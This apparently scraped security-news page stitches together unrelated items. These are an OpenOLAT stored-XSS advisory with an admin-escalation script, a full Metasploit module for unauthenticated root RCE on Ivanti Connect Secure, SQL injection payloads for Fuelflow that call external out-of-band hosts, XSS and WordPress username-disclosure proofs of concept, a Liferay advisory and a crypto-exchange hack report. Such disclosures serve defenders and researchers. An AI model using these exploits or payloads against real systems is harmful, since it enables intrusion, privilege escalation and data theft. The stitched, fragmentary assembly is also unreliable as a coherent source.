OpenOLAT versions 18.1.4 and below and versions 18.1.5 and below suffer from multiple persistent cross site scripting vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240220-0 >  
=======================================================================  
               title: Multiple Stored Cross-Site Scripting Vulnerabilities  
             product: OpenOLAT (Frentix GmbH)  
  vulnerable version: <= 18.1.4 and <= 18.1.5  
       fixed version: 18.1.6 / 18.2  
          CVE number: CVE-2024-25973, CVE-2024-25974  
              impact: High  
            homepage: https://www.openolat.com/  
               found: 2023-12-20 and 2024-01-20  
                  by: Mike Klostermaier (Office Berlin)  
                      Johannes Völpel (Office Berlin)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"frentix operates in the areas of e-learning, software development, multimedia  
and media production. Providing information and lasting impressions – we  
try to reconcile this goal in the area of tension between technology, usability  
and design."

"The LMS OpenOlat is an internet-based learning platform for teaching, learning,  
assessment and communication, an LMS, a learning management system."

Source: https://www.openolat.com/unternehmen/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)  
Insufficient filtering and sanitization of user input leads to the creation  
of groups, courses and other resources that contain XSS payloads.  
This allows an attacker to execute JavaScript code with the permissions of the  
victim in the context of the user's browser.

2) Privilege escalation via XSS due to insecure CSP  
If the content security policy is not set securely and there is content on  
the same page that can be manipulated by the attacker, a privilege  
escalation can take place.

3) Stored Cross-Site-Scripting within the Media Center (CVE-2024-25974)  
Insufficient filtering and sanitization of malicious files uploaded by a user  
leads to stored resources within the Media Center that could contain XSS payloads.  
This allows an attacker to execute JavaScript code with the permissions of the  
victim in the context of the user's browser.

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)  
Various XSS issues have been found in different functions of OpenOLAT.  
The following examples show different attack scenarios.

Example 1 - Stored Cross-Site-Scripting within Coursenames  
Due to insufficient filtering and sanitization of user input, an attacker  
with rights to create or edit groups can create a course with a name that  
contains an XSS payload. When a user edits this course the name including  
the payload is displayed and executed. Furthermore, the XSS payload is  
executed when editing the course via the course-editor, within the course-editor's  
"layout" tab inside the preview. This also happens multiple times at multiple  
locations during the publishing workflow.

The following payload was used as coursename:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```

Example 2 - Stored Cross-Site-Scripting within Catalogname  
An attacker, who is authenticated with rights that allow creating or renaming  
catalogs, is able to create a catalog (also called sub-category) with a name that  
contains an XSS payload due to insufficient filtering and sanitization of user  
input.  
When a user publishes a course, the name of the catalog including the  
payload is displayed and executed within the "Create catalog entry" tab  
when selecting "Add to catalog".

The following payload was used as the catalog name:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```

Example 3 - Stored Cross-Site-Scripting within Curriculum Management  
An authenticated user of a role, who has the authorization to create  
curriculums, is able to create curriculums, whose name contains a JavaScript  
payload. These are shown to the members in some views where the JavaScript  
payload is executed. To do this, navigate to the overview of the curriculums  
via "Curriculum management".  
A curriculum can be created via the "Create new curriculum" button in the  
window that appears. To recreate the vulnerability, it is sufficient to  
enter a JavaScript payload as the identifier.

The following payload was used as curriculum name:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```  
When a user with sufficient rights opens the manipulated curriculum via the  
"curriculum browser" within the "Curriculum management" the payload within  
the curriculum name gets executed within the context of the user's browser.

Example 4 - Stored Cross-Site-Scripting within Alt-Text of Media-Files  
An attacker, who is authenticated with rights that allow uploading files,  
can upload media files via the "Media Centre" and enter metadata for these  
files. One of the fields used for image metadata is the so-called alt-text  
field, which is used to enter an alternative display text for image files.  
This alternative text is not sanitized properly when entered during the upload  
of files.

The following payload was assigned to an image file as alt-text:  
```  
"><img src=a onerror=alert(document.location)>  
```

The upload of the image file works without further problems and is confirmed.  
After successfully uploading the image with a manipulated alt-text, the  
transmitted payload is executed directly. Using the function to share content  
with other users, this manipulated image can be shared to potential victims  
(e.g. a system administrator). The user to whom the image has been shared with  
can preview it in their media center. As soon as the user views the image details,  
the JavaScript payload stored within the alt-text is executed in the context  
of the victim's browser.

2) Privilege escalation due to unsafe-eval  
If the content security policy is not set securely and there is content on the  
same page that can be manipulated by the attacker, a privilege escalation  
can take place. As the content security policy is set to "Report-Only" and  
"unsafe-eval" is set by default in OpenOLAT, it can be possible to use the  
following attack at least in most cases shown here using stored XSS.

An example that loads a script from an external source was not used here,  
as this would not have been possible with an activated CSP, whereas this  
vulnerability can also be exploited with an activated standard CSP from  
OpenOLAT.  
The following example can be used at any given point where a XSS is possible  
and another string can be manipulated within a readable context:  
```  
"><img src=x onerror='var ps = document.querySelectorAll(`p`); for (var i = 0; i  
< ps.length; i++) { var c = ps[i].textContent; if (c.startsWith(`YXN`))  
{ eval(atob(c)); } }'  
```

This JavaScript code searches the website for elements that begin  
with a certain string (in our example "YXN"), decodes them from base64 and  
executes them (due to the unsafe-eval policy) as JavaScript code.  
This has been tested to be working with example 4 with the above payload  
as the alt-text and the payload mentioned below as the description of the  
media file.  
The string "YXN" is the start of the base64-encoded following payload:  
```  
async function main() {  
     function sleep(ms) {  
         return new Promise(resolve => setTimeout(resolve, ms));  
     }  
     var n = 2000;  
     var anchorElement = document.querySelector('a[title="Manage users and system groups"]');  
  anchorElement.click();  
     await sleep(n);  
     var buttons = document.querySelectorAll('a[title="Organisations"]');  
     buttons[0].click();  
     await sleep(n);  
     var links = document.querySelectorAll('a');  
     var organisationLink = Array.from(links).find(function (link) {  
         return link.textContent === 'OpenOLAT';  
     });  
     organisationLink.click();  
     await sleep(n);  
     var links = document.querySelectorAll('a');  
     var chadLink = Array.from(links).find(function (link) {  
         return link.textContent === 'Chad';  
     });  
     await sleep(n);  
     chadLink.click();  
     await sleep(n);  
     var roleTabLinks = document.querySelectorAll('a[role="tab"]');  
     var rolesLink = Array.from(roleTabLinks).find(function (link) {  
         return link.textContent === 'Roles';  
     });  
     await sleep(n);  
     rolesLink.click();  
     await sleep(n);  
     var inputElement = document.querySelector('input[value="administrator"]');  
     inputElement.click();  
     await sleep(n);  
     var inputElement = document.querySelector('input[value="sysadmin"]');  
     inputElement.click();  
     await sleep(n);  
     var saveButton = document.querySelector('button[value="Save"]');  
     saveButton.click();  
}  
main();  
```

The code shown here utilizes the static structure of OpenOLAT. The use of  
control elements is predictable, as long as the name of the organization used  
within the OpenOLAT instance is known. This information is freely accessible to  
every logged-in user. Lines 14 and 20 contain variables which must be adapted  
to the corresponding OpenOLAT instance and attacker username. The executed  
script searches for HTML elements with predictable names in order to navigate  
to an administrative interface within the application and elevate the  
attacker's rights to administrative level.

The script works with two-second pauses between the individual actions  
to ensure that all actions are only executed after the page has loaded. Even  
if this is visible to the victim, the waiting times between the actions can be  
optimized in a real attack and can also be used with the help of obfuscation  
measures (e.g. additional windows that open and hide the actions).

3) Stored Cross-Site-Scripting (XSS) within the Media-Center (CVE-2024-25974)  
It is possible to upload files within the Media Center of OpenOLAT version 18.1.5  
as an authenticated user without any other rights.  
While the filetypes are limited, an SVG containing an XSS payload can be  
uploaded. The following content has been uploaded within a file  
named 'xss.svg':  
```  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<script type="text/javascript">  
     alert(document.location);  
</script>  
</svg>  
```

After a successful upload the file can be shared with groups of users.  
By sharing the file with a group of which an administrator is part of, the  
administrator can access the file and open it, which will open the file in a  
new tab within the browser. This leads to the execution of the shown script and  
will display a message window stating the current domain and path.

Vulnerable / tested versions:  
-----------------------------  
The following versions has been tested which was the latest version available  
at the time of the test:  
* OpenOLAT 18.1.4 Vulnerability 1 and 2  
* OpenOLAT 18.1.5 Vulnerability 3

OpenOLAT version 18.2 was verified whether the identified issues were properly  
fixed.

Vendor contact timeline:  
------------------------  
2024-01-10: Contacting vendor through contact@frentix.com  
2024-01-10: Very quick vendor response within an hour, sending security  
             advisory to provided contact.  
2024-01-10: Feedback from vendor that we submitted known/already fixed issues  
             for version 18.1.  
             Retesting latest version 18.1.4, but only three of our submitted  
             issues had been fixed before (removed from advisory), found  
             additional, new XSS issues again in latest version.  
2024-01-11: Sending updated security advisory to the vendor.  
2024-01-11: Quick feedback from vendor declaring example 1 to 3 as accepted  
             risk, as authors have a trusted position and XSS is only seen as  
             a risk if the attacker is unauthenticated or has low privileges.  
             Example 4 will be patched with the upcoming release. No comment  
             from the vendor on vulnerability 2 regarding the unsafe default  
             configuration.  
2024-01-11: Sending examples 1 to 3 and explaining the risk potential from an  
             attacker's perspective to the vendor. Co-ordination with the vendor  
             regarding the release date of the new version, which includes a fix  
             for example 4. Asking again about the standard configuration  
             mentioned in vulnerability 2 and the vendor's position or judgement  
             on this.  
2024-01-11: Quick reply from the vendor confirming the release date of the new  
             version on 2024-01-17. With regard to examples 1 to 3, the vendor  
             confirmed that no fix is planned. Reference is made to modules in  
             development which will replace the modules containing  
             vulnerabilities in the course of upcoming releases. With regard  
             to privilege escalation, which is enabled by the CSP in chapter 2,  
             the vendor points out that the "unsafe-eval" or "unsafe-inline"  
             option cannot simply be deactivated in the architecture currently  
             in use. With regard to the "report-only" setting of the CSP, the  
             vendor refers to the lack of possibilities to enforce this on  
             the part of the vendor. However, the vendor advises customers to  
             activate it.  
2024-01-17: Release of version 18.1.5 by the vendor. A fix of example 1, 2 and 4  
             was verified by the researchers within this version. Example 3 as  
             well as the CSP from chapter 2 are still exploitable. The PoC code  
             snipped has been redacted in example 3.  
2024-01-18: Mail from vendor, informing us about the release of the patched  
             version. Vendor states, that the development of OpenOLAT will use  
             all points from this advisory as guidance for further improvements.  
2024-01-19: Sending mail to vendor confirming that the examples 1, 2 and 4  
             are fixed. Submitted updated draft of this advisory.  
2024-01-21: Informing vendor about new found XSS within the Media Center, which  
             has been added to this advisory as vulnerability 3 (SVG).  
2024-01-21: Fast response from vendor informing us, that the found XSS will be  
             fixed with an update at the end of January.  
2024-01-23: Sending mail to the vendor thanking for the quick reply.  
2024-01-31: Release of version 18.1.6 by the vendor.  
2024-02-09: The researchers can confirm, that all vulnerabilities mentioned  
             within chapters 1 and 3 are fixed and can no longer be exploited.  
             Vulnerability 2 still works as documented. Informing the vendor,  
             that we can confirm the fix and thanking again for the quick and  
             solution-oriented communication.  
2024-02-09: Vendor: Systematic search for further XSS issues, version 18.2.1  
             contains even more fixes. Version 19 will have CSP enabled by  
             default.  
2024-02-13: Assigning CVE numbers.  
2024-02-20: Coordinated release of security advisory.

Solution:  
---------  
The vendor provided a patched version 18.1.6 / 18.2 or higher which can be downloaded  
from:  
https://www.openolat.com/releases/

Additionally, it is advised to set the Content-Security-Policy active, instead  
of "Report-Only" as well as configuring it as strictly as possible. The upcoming  
version 19 will enable CSP by default.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Johannes Völpel & Mike Klostermaier / @2024

OpenOLAT 18.1.5 Cross Site Scripting / Privilege Escalation

This Metasploit module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions 8.x and below are also vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',        'Description' => %q{          This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and          22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions          8.x and below are also vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2024-21893'], # The SSRF as Ivanti reported it, but it is actually an existing vuln in the library xmltooling.          ['CVE', '2023-36661'], # The original SSRF CVE id in xmltooling, as disclosed by Shibboleth.          ['CVE', '2024-21887'], # The command injection vulnerability (Ivanti grouped several under one CVE).          ['URL', 'https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis'], # Rapid7 Analysis of CVE-2024-21893          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'], # Rapid7 Analysis of CVE-2024-21887          ['URL', 'https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure'],          ['URL', 'https://shibboleth.net/community/advisories/secadv_20230612.txt']        ],        'DisclosureDate' => '2024-01-31',        'Platform' => %w[linux unix],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as root.        'Targets' => [          # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:          # cmd/linux/http/x64/meterpreter/reverse_tcp          # cmd/linux/http/x64/shell/reverse_tcp          # cmd/linux/http/x86/shell/reverse_tcp          # cmd/unix/python/meterpreter/reverse_tcp          # cmd/unix/reverse_bash          # cmd/unix/reverse_python          ['Automatic', {}]        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )  end  def check    # We get a static resource that contains an old banner circa 2018. The product "Connect Secure" was acquired by    # Ivanti when Ivanti acquired "Pulse Secure", so we look for this string. This lets us confirm the target is running    # the product "Connect Secure" (Tested against 22.3R1). We do not have an unauthenticated method to get a version    # number, so this check routine can only return either Detected or Unknown.    # This exploit chain based on CVE-2024-21893 bypasses a mitigation for an earlier exploit chain, based upon    # CVE-2023-46805. Therefore, we dont leverage CVE-2023-46805 to access the /api/v1/system/system-information    # endpoint for version information, as we assume the target has the first Ivanti mitigation applied. If the target    # has not had the first mitigation applied, then the exploit ivanti_connect_secure_rce_cve_2023_46805 will work.    res = send_request_cgi(      'method' => 'GET',      'uri' => '/dana-na/css/visibility.css'    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe if res.code != 200    if res.body.include? 'Pulse Secure'      return CheckCode::Detected    end    Exploit::CheckCode::Unknown  end  def exploit    # The SSRF URL we use targets a Python backend service bound to 127.0.0.1:8090. This backend service is vulnerable    # to an unauthenticated command injection vulnerability (CVE-2024-21887).    # Note: Ivanti grouped multiple command injection vulnerabilities into CVE-2024-21887. We choose one that can be    # triggered via a single HTTP GET request, as this is what the SSRF gives us (i.e. The SSRF does not perform a POST    # request).    ssrf_url = "http://127.0.0.1:8090/api/v1/license/keys-status/#{Rex::Text.uri_encode(";#{payload.encoded} #")}"    # CVE-2024-21893 is an SSRF in the xmltooling library when processing a Signature with a KeyInfo element. The    # KeyInfo element can have a RetrievalMethod element with a URI attribute that points to a remote resource. The    # xmltooling library will perform a HTTP GET request to this URI, giving us an SSRF exploit primitive.    # While Ivanti reported this as CVE-2024-21893, it is actually CVE-2023-36661 and was patched by the upstream vendor    # several months prior to being exploited in the wild in Ivanti Connect Secure.    xml_data = %(<?xml version="1.0" encoding="UTF-8"?>    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Body>        <ds:Signature        xmlns:ds="http://www.w3.org/2000/09/xmldsig#">          <ds:SignedInfo>            <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>            <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>          </ds:SignedInfo>          <ds:SignatureValue>#{Rex::Text.rand_text_hex(20)}</ds:SignatureValue>          <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">            <ds:RetrievalMethod URI="#{ssrf_url}"/>            <ds:X509Data/>          </ds:KeyInfo>          <ds:Object></ds:Object>        </ds:Signature>      </soap:Body>    </soap:Envelope>)    send_request_cgi(      'method' => 'POST',      'uri' => '/dana-ws/saml20.ws',      'ctype' => 'text/xml',      'data' => xml_data    )  endend

Ivanti Connect Secure Unauthenticated Remote Code Execution

Cybersecurity researchers have identified two authentication bypass flaws in open-source Wi-Fi software found in Android, Linux, and ChromeOS devices that could trick users into joining a malicious clone of a legitimate network or allow an attacker to join a trusted network without a password.
The vulnerabilities, tracked as CVE-2023-52160 and CVE-2023-52161, have been discovered following a

New Wi-Fi Vulnerabilities Expose Android and Linux Devices to Hackers

Ubuntu Security Notice 6584-2 - USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update provides the corresponding updates for CVE-2021-33912 andCVE-2021-33913 in Ubuntu 16.04 LTS. Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6584-2  
February 21, 2024

libspf2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Libspf2.

Software Description:  
- libspf2: Sender Policy Framework for SMTP authorization

Details:

USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and  
Ubuntu 20.04 LTS. This update provides the corresponding updates for  
CVE-2021-33912 and CVE-2021-33913 in Ubuntu 16.04 LTS.

We apologize for the inconvenience.

Original advisory details:

  Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled  
  certain inputs. If a user or an automated system were tricked into opening a  
  specially crafted input file, a remote attacker could possibly use this issue  
  to cause a denial of service or execute arbitrary code. (CVE-2021-20314)

  It was discovered that Libspf2 incorrectly handled certain inputs. If a user or  
  an automated system were tricked into opening a specially crafted input file, a  
  remote attacker could possibly use this issue to cause a denial of service or  
  execute arbitrary code. This issue only affected Ubuntu 18.04 LTS and  
  Ubuntu 20.04 LTS. (CVE-2021-33912, CVE-2021-33913)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libmail-spf-xs-perl             1.2.10-6ubuntu0.1~esm2  
   libspf2-2                       1.2.10-6ubuntu0.1~esm2  
   libspf2-dev                     1.2.10-6ubuntu0.1~esm2  
   spfquery                        1.2.10-6ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6584-2  
   https://ubuntu.com/security/notices/USN-6584-1  
   CVE-2021-33912, CVE-2021-33913

Ubuntu Security Notice USN-6584-2

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

Fuelflow version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi## Author: nu11secur1ty## Date: 02/21/24## Vendor: https://www.mayurik.com/## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'was submitted in the email parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can receive very sensitive informationabout this system by using these vulnerabilities!STATUS: HIGH-Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-5782' OR 2852=2852 OR'nYvi'='GjbH&password=h3I!y3o!F9&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'BiVP'='cVHj&password=h3I!y3o!F9&submit=    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECTSLEEP(7)#&password=h3I!y3o!F9&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR'Lshu'='MGpY&password=h3I!y3o!F9&submit=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)## Time spent:00:35:00

Fuelflow 1.0 SQL Injection

WEBIGniter version 28.7.23 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)# Exploit Author: Sagar Banwa# Date: 19/10/2023# Vendor: https://webigniter.net/# Software: https://webigniter.net/demo# Reference: https://portswigger.net/web-security/cross-site-scripting# Tested on: Windows 10/Kali Linux# CVE : CVE-2023-46391Stored Cross-site scripting(XSS):Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.Steps-To-Reproduce:1. Login to the Account 2. Go to the Categories.3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.phpRequest POST /cms/categories/add HTTP/2Host: demo.webigniter.netCookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 94Origin: https://demo.webigniter.netReferer: https://demo.webigniter.net/cms/categories/addUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersname=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

WEBIGniter 28.7.23 Cross Site Scripting

Stored cross-site scripting (XSS) vulnerability in the Document and Media widget in Liferay Portal 7.4.3.18 through 7.4.3.101, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 18 through 92 allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a document's “Title” text field.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-47795

**Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting**

Critical severity GitHub Reviewed Published Feb 21, 2024 to the GitHub Advisory Database • Updated Feb 21, 2024

**Package**

maven com.liferay.portal:release.dxp.bom (Maven)

**Affected versions**

\>= 2023.Q3, < 2023.Q3.6

\>= 7.4.13.u18, <= 7.4.13.u92

**Patched versions**

2023.Q3.6

2023.Q3.6

maven com.liferay.portal:release.portal.bom (Maven)

\>= 7.4.3.18, <= 7.4.3.101

**Description**

Published to the GitHub Advisory Database

Feb 21, 2024

Last updated

Feb 21, 2024

GHSA-q2cv-7j58-rfmj: Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting

By Deeba Ahmed
FixedFloat suffered a significant loss of over 1,700 Ethereum and over 400 Bitcoin due to a drainer attack on February 18, 2024.
This is a post from HackRead.com Read the original post: Crypto Exchange FixedFloat Hacked: $26 Million in BTC, ETH Stolen

Another day, another cryptocurrency exchange falls victim to a massive data breach. This time, it’s FixedFloat, a non-KYC Bitcoin and Ethereum crypto exchange targeted in a wallet-drainer attack.

FixedFloat, a decentralized crypto exchange, has been hacked for at least $26 million worth of **Bitcoin and Ethereum**. The attack, initially attributed to minor technical issues, has led to frozen transactions and missing funds.

For your information, FixedFloat is an automated crypto exchange with 26% of its web traffic coming from the US. It integrates with Lightning Network for Bitcoin transactions.

As seen by Hackread.com, users reported frozen transactions and missing funds on the X exchange since February 17, with 409 Bitcoin (Approximately $21 million) and 1,728 Ether tokens (approximately $4.7 million) drained on February 18.

The exchange is investigating the security incident. FixedFloat’s website is also displaying an error message on all pages, stating **“ERROR – Technical work is underway, we will be back soon! If you need to contact us, you can do this via chat.”**

The stolen funds were sent to the Ethereum exchange. Threat researcher going by the X (formerly Twitter) handle of “**Officer’s Notes**” revealed that the hacker first transferred ETH to different ETH addresses and finally moved them to the eXch exchange. They then sent funds to two HitBTC addresses, which received their initial ETH deposits in 2021. This seems to be an attempt to create a false trail.

> . @FixedFloat hacked, resulting in ~1,728 ETH (worth ~$4.85m) and & 409 BTC (worth ~$21m) stolen. The drainer already transferred most of the stolen ETH to eXch on Ethereum. 26M$ loss in total!
> 
